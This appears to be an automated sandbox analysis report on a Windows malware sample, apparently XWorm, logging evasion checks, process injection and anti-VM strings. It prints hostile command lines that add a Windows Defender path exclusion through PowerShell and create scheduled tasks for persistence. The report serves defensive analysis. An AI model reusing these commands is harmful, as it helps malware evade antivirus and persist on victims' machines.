              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: 9758xBqgE1azKnB.exe PID: 7128, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: grjujyNaBLaKbU.exe PID: 888, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 9758xBqgE1azKnB.exe PID: 7568, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 9758xBqgE1azKnB.exe PID: 7868, type: MEMORYSTR
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeMemory allocated: 14C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeMemory allocated: 2FE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeMemory allocated: 2E00000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeMemory allocated: 9200000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeMemory allocated: A200000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeMemory allocated: A410000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeMemory allocated: B410000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeMemory allocated: 18F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeMemory allocated: 32A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeMemory allocated: 30B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeMemory allocated: 1090000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeMemory allocated: 2B00000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeMemory allocated: 4B00000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeMemory allocated: 8660000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeMemory allocated: 9660000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeMemory allocated: 9850000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeMemory allocated: A850000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeMemory allocated: 1480000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeMemory allocated: 2E60000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeMemory allocated: 4E60000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMemory allocated: 1480000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMemory allocated: 2DE0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMemory allocated: 4DE0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMemory allocated: 8A40000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMemory allocated: 9A40000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMemory allocated: 9C30000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMemory allocated: AC30000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMemory allocated: 2F00000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMemory allocated: 3170000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMemory allocated: 2F80000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMemory allocated: 940000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMemory allocated: 23B0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMemory allocated: 43B0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMemory allocated: 8130000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMemory allocated: 9130000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMemory allocated: 9320000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMemory allocated: A320000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMemory allocated: 2890000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMemory allocated: 2AF0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMemory allocated: 2910000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6157Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3611Jump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeWindow / User API: threadDelayed 2612Jump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeWindow / User API: threadDelayed 7227Jump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe TID: 7156Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe TID: 6240Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe TID: 7492Thread sleep time: -32281802128991695s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe TID: 5924Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe TID: 7184Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe TID: 7428Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe TID: 7572Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe TID: 7592Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe TID: 7728Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe TID: 7872Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe TID: 7884Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe TID: 8108Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeThread delayed: delay time: 30000Jump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeThread delayed: delay time: 30000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeThread delayed: delay time: 30000
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeThread delayed: delay time: 30000
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeThread delayed: delay time: 922337203685477
              Source: Amcache.hve.28.drBinary or memory string: VMware
              Source: Amcache.hve.28.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.28.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.28.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.28.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.28.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.28.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.28.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.28.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: 9758xBqgE1azKnB.exe, 00000013.00000002.1914378902.00000000068D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Prod_VMware_
              Source: Amcache.hve.28.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: Amcache.hve.28.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.28.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3824966064.0000000001577000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
              Source: Amcache.hve.28.drBinary or memory string: vmci.sys
              Source: Amcache.hve.28.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
              Source: Amcache.hve.28.drBinary or memory string: vmci.syshbin`
              Source: Amcache.hve.28.drBinary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.28.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.28.drBinary or memory string: VMware20,1
              Source: Amcache.hve.28.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.28.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.28.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.28.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.28.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.28.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.28.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.28.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.28.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.28.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.28.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"Jump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeMemory written: C:\Users\user\Desktop\9758xBqgE1azKnB.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeMemory written: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMemory written: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMemory written: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"Jump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess created: C:\Users\user\Desktop\9758xBqgE1azKnB.exe "C:\Users\user\Desktop\9758xBqgE1azKnB.exe"Jump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess created: C:\Users\user\Desktop\9758xBqgE1azKnB.exe "C:\Users\user\Desktop\9758xBqgE1azKnB.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpBA0A.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeProcess created: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeProcess created: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpE11A.tmp"
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess created: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmp21F.tmp"
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess created: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
              Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @\tq@\tq-PING!<Xwormmm>Program Manager<Xwormmm>2003543
              Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032D9000.00000004.00000800.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000035C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>2008415
              Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.0000000003563000.00000004.00000800.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000035B3000.00000004.00000800.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000035C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.0000000003563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $tq'PING!<Xwormmm>Program Manager<Xwormmm>0Tetqh7V
              Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>2003543
              Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $tq-PING!<Xwormmm>Program Manager<Xwormmm>1795112Tetq
              Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000035B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $tq'PING!<Xwormmm>Program Manager<Xwormmm>0Tetqh7[
              Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $tq-PING!<Xwormmm>Program Manager<Xwormmm>2003543Tetq
              Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000035C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $tq'PING!<Xwormmm>Program Manager<Xwormmm>0Tetqhw\
              Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>1795112
              Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000035C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $tq'PING!<Xwormmm>Program Manager<Xwormmm>0Tetqh7_
              Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $tq-PING!<Xwormmm>Program Manager<Xwormmm>2008415Tetq
